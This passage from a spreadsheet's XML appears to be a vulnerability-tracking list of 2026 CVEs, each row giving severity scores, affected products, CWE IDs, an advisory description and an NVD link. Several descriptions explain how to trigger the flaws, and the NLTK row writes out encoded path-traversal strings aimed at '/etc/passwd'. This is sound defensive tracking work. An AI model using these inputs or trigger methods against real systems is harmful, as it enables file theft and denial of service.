This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49362</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49363</t>
        </is>
      </c>
      <c r="C1040" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1040" s="5" t="inlineStr"/>
      <c r="F1040" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1040" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1040" s="5" t="inlineStr"/>
      <c r="I1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1040" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker connecting with the CORE protocol can discover cluster node details by sending a SUBSCRIBE_TOPOLOGY request prior to authentication.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49363</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50010</t>
        </is>
      </c>
      <c r="C1041" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1041" s="5" t="inlineStr"/>
      <c r="F1041" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1041" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1041" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1041" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1041" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SimpleTrustManagerFactory.engineGetTrustManagers() and related paths wrap any user-supplied plain X509TrustManager in X509TrustManagerWrapper, which extends X509ExtendedTrustManager but implements the 3-arg checkServerTrusted(chain, authType, SSLEngine) by discarding the SSLEngine and calling the 2-arg delegate. Because the object now IS an X509ExtendedTrustManager, neither SunJSSE's internal AbstractTrustManagerWrapper nor Netty's own OpenSslX509TrustManagerWrapper will re-wrap it to add endpoint-identification. Consequently, even though Netty 4.2 sets endpointIdentificationAlgorithm="HTTPS" by default, a client built with `SslContextBuilder.forClient().trustManager(somePlainX509TrustManager)` performs no hostname verification at all. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50010</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50011</t>
        </is>
      </c>
      <c r="C1042" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1042" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1042" s="5" t="inlineStr"/>
      <c r="F1042" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1042" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1042" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1042" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1042" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, RedisArrayAggregator pre-allocates ArrayList with initial capacity equal to the RESP array element count declared in an array header. That count is taken from the wire before the corresponding child messages exist. A small malicious header can claim a huge initial capacity. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50011</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52880</t>
        </is>
      </c>
      <c r="C1043" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1043" s="5" t="inlineStr"/>
      <c r="F1043" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1043" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1043" s="5" t="inlineStr"/>
      <c r="I1043" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1043" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Versions from 1.7.14 through 1.7.17 are vulnerable to a remotely triggerable denial of service. Both REST APIs are started with the Gin Engine.Run convenience method, which serves requests through Go's default HTTP server with no ReadHeaderTimeout, ReadTimeout, or MaxHeaderBytes configured. As a result, incoming connections that never complete their request headers are held open indefinitely. When a REST listener is reachable beyond localhost through the documented all-interface bind or a Docker port-publish deployment, a single unauthenticated client can open many slow-header connections and hold them open until server file descriptors are exhausted, preventing the API from accepting new connections. This renders the REST API unavailable to legitimate clients. This issue is fixed in version 1.7.18.</t>
        </is>
      </c>
      <c r="M1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52880</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54293</t>
        </is>
      </c>
      <c r="C1044" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1044" s="5" t="inlineStr"/>
      <c r="F1044" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1044" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1044" s="5" t="inlineStr">
        <is>
          <t>nltk:nltk</t>
        </is>
      </c>
      <c r="I1044" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1044" s="5" t="inlineStr">
        <is>
          <t>NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. Prior to 3.10.0-rc1, nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem. While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path. This vulnerability is fixed in 3.10.0-rc1.</t>
        </is>
      </c>
      <c r="M1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54293</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55099</t>
        </is>
      </c>
      <c r="C1045" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1045" s="5" t="inlineStr"/>
      <c r="F1045" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1045" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1045" s="5" t="inlineStr"/>
      <c r="I1045" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L1045" s="5" t="inlineStr">
        <is>
          <t>icalendar is an RFC 5545 compatible parser and generator of iCalendar files for Python. From 7.1.0 until 7.1.3, the Component equality method in src/icalendar/cal/component.py compares nested subcomponents with two membership loops, and each membership test invokes the same method on child components, causing O(2^n) work relative to nesting depth. Component.from_ical accepts arbitrarily nested BEGIN:VEVENT blocks without a depth limit, so an attacker can submit a sub-kilobyte .ics file containing equal nested subtrees and trigger the cost when an application performs equality, inequality, membership, deduplication, test-assertion, round-trip, or normalization comparisons. Parsing alone does not trigger the issue, and comparisons that differ early short-circuit, but a few hundred bytes can pin a CPU core for minutes or indefinitely, causing denial of service in calendar sync or import endpoints, invite processing, and other comparison paths. This issue is fixed in version 7.1.3.</t>
        </is>
      </c>
      <c r="M1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55099</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55215</t>
        </is>
      </c>
      <c r="C1046" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1046" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1046" s="5" t="inlineStr"/>
      <c r="F1046" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1046" s="5" t="inlineStr">
        <is>
          <t>node.js, mysql</t>
        </is>
      </c>
      <c r="H1046" s="5" t="inlineStr"/>
      <c r="I1046" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-522</t>
        </is>
      </c>
      <c r="L1046" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to versions 3.3.3, 3.4.6, and 3.5.3, when ssl is enabled without a pinned CA or server certificate, MariaDB Connector/Node.js sends credentials before completing certificate fingerprint validation. In lib/cmd/handshake/auth/handshake.js, a server that selects mysql_clear_password as the initial authentication plugin can receive the password before the post-TLS identity check. In lib/cmd/handshake/authentication.js, an authentication switch can evaluate the previous plugin instead of the requested target plugin, allowing mysql_clear_password to send the credential first. An active man-in-the-middle can present a self-signed certificate, capture the database password, and use it to authenticate directly even though the connector later rejects the server and closes the connection. This issue is fixed in versions 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="M1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55215</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55552</t>
        </is>
      </c>
      <c r="C1047" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1047" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1047" s="5" t="inlineStr"/>
      <c r="F1047" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1047" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1047" s="5" t="inlineStr"/>
      <c r="I1047" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1047" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.11.13, Yamcs StaticFileHandler.locateFile resolves an unauthenticated request path without using Path.normalize and Path.toAbsolutePath to confirm that the absolute path remains within the configured staticRoots. A path containing traversal segments can escape the intended web root and return an arbitrary readable host file. The flaw is in yamcs-core/src/main/java/org/yamcs/http/StaticFileHandler.java and can disclose sensitive operating-system and application data. This issue is fixed in version 5.11.13, and the 5.12 line is fixed from version 5.12.0.</t>
        </is>
      </c>
      <c r="M1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55552</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55553</t>
        </is>
      </c>
      <c r="C1048" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1048" s="5" t="inlineStr"/>
      <c r="F1048" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1048" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1048" s="5" t="inlineStr"/>
      <c r="I1048" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201, CWE-522</t>
        </is>
      </c>
      <c r="L1048" s="5" t="inlineStr">
        <is>
          <t>urllib is an HTTP client for Node.js that supports authentication, redirects, timeouts, and other request features. Prior to 4.9.1 and 2.44.1, urllib follows redirects through followRedirect but reuses caller-supplied options across origins. In src/HttpClient.ts, #requestInternal recursively calls this.#requestInternal(nextUrl.href, options, requestContext), causing options.headers and auth or digestAuth values to be reused when the redirect target has a different scheme, host, or port. Authorization, Cookie, Proxy-Authorization, x-api-key, x-auth-token, and x-access-token can therefore be sent to an attacker-controlled redirected origin, exposing credentials intended for the original origin and potentially allowing reuse against the original partner API or related services. No user interaction is required. This issue is fixed in versions 2.44.1 and 4.9.1.</t>
        </is>
      </c>
      <c r="M1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55553</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55620</t>
        </is>
      </c>
      <c r="C1049" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1049" s="5" t="inlineStr"/>
      <c r="F1049" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1049" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1049" s="5" t="inlineStr"/>
      <c r="I1049" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr">
        <is>
          <t>CWE-1124, CWE-770</t>
        </is>
      </c>
      <c r="L1049" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, eml_parser.routing.noparenthesis in eml_parser/routing.py removes parenthesized CFWS comments from Received: headers with a regex-based fix-point loop whose running time is quadratic in the nesting depth. A single Received: header with 5,000 nested parentheses causes approximately 1.3 seconds of CPU saturation per parsed message, and doubling the nesting depth approximately quadruples the running time. An attacker can submit relatively small EML files that consume multiple seconds of processing time, causing worker latency, queue backpressure, and possible service-level outages in synchronous gateways, sandboxes, and real-time triage pipelines. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="M1049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55620</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55841</t>
        </is>
      </c>
      <c r="C1050" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1050" s="5" t="inlineStr"/>
      <c r="F1050" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1050" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1050" s="5" t="inlineStr"/>
      <c r="I1050" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr">
        <is>
          <t>CWE-138</t>
        </is>
      </c>
      <c r="L1050" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. Prior to Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3, the FortiGate key-value syslog parser in graylog2-server/src/main/java/org/graylog2/inputs/codecs/GLFortiGateSyslogEvent.java and graylog2-server/src/main/java/org/graylog2/inputs/codecs/SyslogCodec.java mishandles field-like text inside quoted values. GLFortiGateSyslogEvent.getFields() uses KV_PATTERN and QUOTED_KV_PATTERN, while SyslogCodec.parse() invokes the FortiGateSyslogEvent parser; crafted values containing = or backslash-escaped quotes can cause embedded keys such as srcip, dstip, date, time, and tz to remove or overwrite original top-level fields or produce an invalid message that Graylog discards. An unauthenticated network sender who can submit syslog messages can therefore manipulate security-log fields or evade logging to obscure malicious activity. This issue is fixed in Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3.</t>
        </is>
      </c>
      <c r="M1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55841</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56671</t>
        </is>
      </c>
      <c r="C1051" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1051" s="5" t="inlineStr"/>
      <c r="F1051" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1051" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1051" s="5" t="inlineStr"/>
      <c r="I1051" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1051" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a modular diffusion model GUI, api and backend with a graph/nodes interface. Prior to 0.28.0, get_model_preview in app/model_manager.py joins an unrestricted filename route capture to a selected model directory without a containment check, allowing an unauthenticated remote attacker to use traversal, encoded traversal, absolute paths, or an unbounded path_index to read image-decodable files and enumerate host paths. get_model_preview (app/model_manager.py) built the path with os.path.join(folder, filename) where filename is an unrestricted {filename:.*} route capture. Literal ../, percent-encoded %2e%2e%2f, and absolute paths all escaped the model directory; path_index was also unbounded. The target file is piped through Pillow and re-encoded as WEBP, so disclosure is limited to image-decodable files plus a file-existence/enumeration oracle (and internal-path leakage via path_index errors). This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56671</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57098</t>
        </is>
      </c>
      <c r="C1052" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1052" s="5" t="inlineStr"/>
      <c r="F1052" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1052" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1052" s="5" t="inlineStr"/>
      <c r="I1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1052" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57099</t>
        </is>
      </c>
      <c r="C1053" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1053" s="5" t="inlineStr"/>
      <c r="F1053" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1053" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1053" s="5" t="inlineStr"/>
      <c r="I1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1053" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5946</t>
        </is>
      </c>
      <c r="C1054" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1054" s="5" t="inlineStr"/>
      <c r="F1054" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G1054" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1054" s="5" t="inlineStr">
        <is>
          <t>isc:bind</t>
        </is>
      </c>
      <c r="I1054" s="5" t="inlineStr">
        <is>
          <t>2026-05-20</t>
        </is>
      </c>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-1287, CWE-20, CWE-617, CWE-754, CWE-843</t>
        </is>
      </c>
      <c r="L1054" s="5" t="inlineStr">
        <is>
          <t>Multiple flaws have been identified in `named` related to the handling of DNS messages whose CLASS is not Internet (`IN`) — for example, `CHAOS` or `HESIOD`, or DNS messages that specify meta-classes (`ANY` or `NONE`) in the question section. Specially crafted requests reaching the affected code paths — recursion, dynamic updates (`UPDATE`), zone change notifications (`NOTIFY`), or processing of `IN`-specific record types in non-`IN` data — can cause assertion failures in `named`.
This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.</t>
        </is>
      </c>
      <c r="M1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5946</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59902</t>
        </is>
      </c>
      <c r="C1055" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1055" s="5" t="inlineStr"/>
      <c r="F1055" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1055" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1055" s="5" t="inlineStr"/>
      <c r="I1055" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1055" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.sctp.SctpMessageCompletionHandler limits incomplete messages and fragment counts but not maxBufferedBytes, allowing unauthenticated peers to exhaust memory with large SCTP fragments. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59902</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62295</t>
        </is>
      </c>
      <c r="C1056" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1056" s="5" t="inlineStr"/>
      <c r="F1056" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1056" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1056" s="5" t="inlineStr"/>
      <c r="I1056" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L1056" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.11, the JSON utility parser in org.hl7.fhir.utilities.json.parser.JsonParser enforces no maximum nesting depth for arrays or objects. As a result, a small but deeply nested, syntactically valid FHIR JSON document can trigger unbounded readArray() or readObject() recursion, raising a StackOverflowError before structural validation runs. An attacker who can submit JSON resources for validation can thus crash the request thread, and services that do not isolate StackOverflowError safely may experience worker loss or process instability — a denial-of-service condition. This issue is fixed in version 6.9.11.</t>
        </is>
      </c>
      <c r="M1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62295</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62296</t>
        </is>
      </c>
      <c r="C1057" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1057" s="5" t="inlineStr"/>
      <c r="F1057" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1057" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1057" s="5" t="inlineStr"/>
      <c r="I1057" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L1057" s="5" t="inlineStr">
        <is>
